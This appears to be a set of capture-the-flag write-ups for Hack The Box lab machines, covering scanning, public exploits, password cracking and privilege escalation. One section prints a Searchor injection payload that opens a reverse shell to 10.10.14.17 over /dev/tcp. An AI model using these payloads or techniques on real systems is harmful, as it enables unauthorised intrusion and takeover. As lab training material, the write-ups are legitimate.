First, I performed a port and version scan using Nmap.
There is a buffer overflow vulnerability that related ssl
I got the exploit from searchsploit. I uploaded last version of exploit because of there are some bugs of previous version.
searchsploit -m unix/remote/47080.c
I just got warning error during the compile.
gcc -o OpenFuck 47080.c -lcrypto
./OpenFuck -h
I made some changing to code. I download ptrace-kmod.c in my local and I open a web service on 5000 port.
I have scanned with nmap command and I try different thing.
Enumeration
Rustscan is a very useful tool for scanning all ports. The tool is very fast and can scan all ports within 1 second. I will use it for the entire enumeration process.
I scanned 79 port with finger-user-enum.pl. You can download the file. sammy and sunny may be login to ssh.
Initial foothold
I tried SSH brute force with Hydra, but it took a lot of time, so I decided to use the port number as the password
When I run sudo -l command. I see that can run file without permission.
As I understand, when I run the file I see the output that file run id command.
By the way There is a other user except root and sunny. It is sammy user. I looked bash_history and backup directory is significant.
I found two hashes under the backup directory.
Prilivige Escalation
“I tried to crack the hash of sammy using the john command.
I login ssh with user sammy and when I run sudo -l command, I can use wget command with root permission.
I changed troll file with using wget command and I run troll command with sunny user.
I create http server on my local machine to send the troll file to target machine.
I scanned all ports with nmap.
Enumeration
I searched endpoint with gobuster but it fails to find a directory.
Initial Foothold
I searched the header info and php version has a weakness.
The weakness causes command execution vulnerability and I execute any command over User-agent header. I prepare the rev. shell command and execute it.
I access to target machine via reverse shell
Privesc Escalation
I execute sudo -l command and sudo /usr/bin/knife and I got a info that how can ı run this command.
I saw interesting usage that I can abuse in the information.
knife exec command may supports to me read the root.txt file and got a flag.
I scanned ports with nmap command.
Enumeration
I added the domain name /etc/hosts
Initial Foothold
I searched the searchor 2.4.0 whether be vulnerable or not.
Okey. There is a vulnerable version and a weakness that allows arbitrary code execution.
'+%2b+__import__('os').popen('id').read()+%2b+'
'+%2b+__import__('os').popen('bash+-c+"sh+-i+>%26+/dev/tcp/10.10.14.17/9001+0>%261"').read()+%2b'
I got the reverse shell and read the user flag.
A while minute later, I found the config and there is a credential for cody. At the same time cody’s password is also svc user. I login as svc user.
Privilege Escalation
I looked docker config via docker-inscpect command.
sudo python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .config}}' 960
I executed docker-ps command and looked the mysql runs on the system and I login to mysql as gitea credentials
I saw the administrator’s passwd but ı could not crack the hash and I tried config password that found with docker inspect command. Yes it works.
I login to gitea as administrator user and examined the codes I found a vulnerability that cause got a root user.
I prepare the payload to exexute in the home/svc and
nan
Enumeration
I scanned ports with nmap command. It founds two ports that is 22 and 80.
I examined http server on 80 port.
I scanned directory with gobuster. There are valuable directories. I looked all directories that returns 200.
Initial Foothold
/README file
I searched this version of nibbleblog whether be vulnerable or not. Luckly. I found a exploit.
https://github.com/dix0nym/CVE-2015-6967
I create a shell payload to use as a webshell.
I run the exploit script. Exploit uploads the shell.php as a image.php. I run the command on the webshell.
I prepare rev shell payload and executed over webshell. I got user flag.
Privilege Escalation
after the sudo -l command I undertand how can ı do with the monitor.sh and inject bash command in sh file. I got the root flag.
Firstly, I have scanned ports with nmap.
two services are running on the target machine and I looked the webservice and scanned the directory with gobuster
All endpoints return either 403 or 301 I can’t find more information about website. Let’s go more deep. I have scanned every endpoint until find a valuable info.
ffuf -c -w /SecLists-2024.4/Discovery/Web-Content/quickhits.txt -u "http//:sea.htb/themes/bike/FUZZ" -t 200 -fx 403
I found about website’s CMS. CMS name is WonderCMS and searched vulnerability whether be or not. Luckly, I found exploit
https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCEpython3 CVE-2023-41425.py -rhost http://sea.htb/loginURL -lhost 10.10.14.17 -lport 9001 -sport 8000there is database.js under the var/www/sea/data
hash is bcrypt hash and I crack the hash with hashcat.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
I looked the users under home directory
I tried 2 users and amay is working to ssh connection and got user flag
After netstat command, there are open ports that it’s number may be working to find new clue.
netstat -tlnp
I made port forwarding via ssh command
ssh -L 8888:localhost:8080 amay@sea.htbI login with amay credentials
I have analyzed
I click the analyze button.
I looked the access.log directory to understanding which user created file.
File has created by root. I opened burp suite and examined request. I changed request and Finally I got root flag.
I open the binary with ghidra and there is a if else situation and We convert hex value to ascii so Therefore I find a flag.
Flag: HTB{br0k3n_4p4rt0..n3ver_t0_b3_r3p4lr3d}
Hello All.
I have solved Hunting license reverse challenge.
I open the binary with ghidra. We see the main function.
There is function that is name exam. I look the exam function.
We see the 2 functions. These are reverse and xor.
Firstly, I look reverse function.
This function gets a list as a param_1 and param_2 and gets a integer value. Integer value provide a limit of for function. I look the t list and get a note for the reversing.
I look the other function. function provides to make a xor between local_38 and t2 list.
I start the target ip and port with nc and encounter console ask some questions. I answer the question.
After the last question, I get a flag.
It is same the previous challenge so it is not necessary to write new writeup 🙂
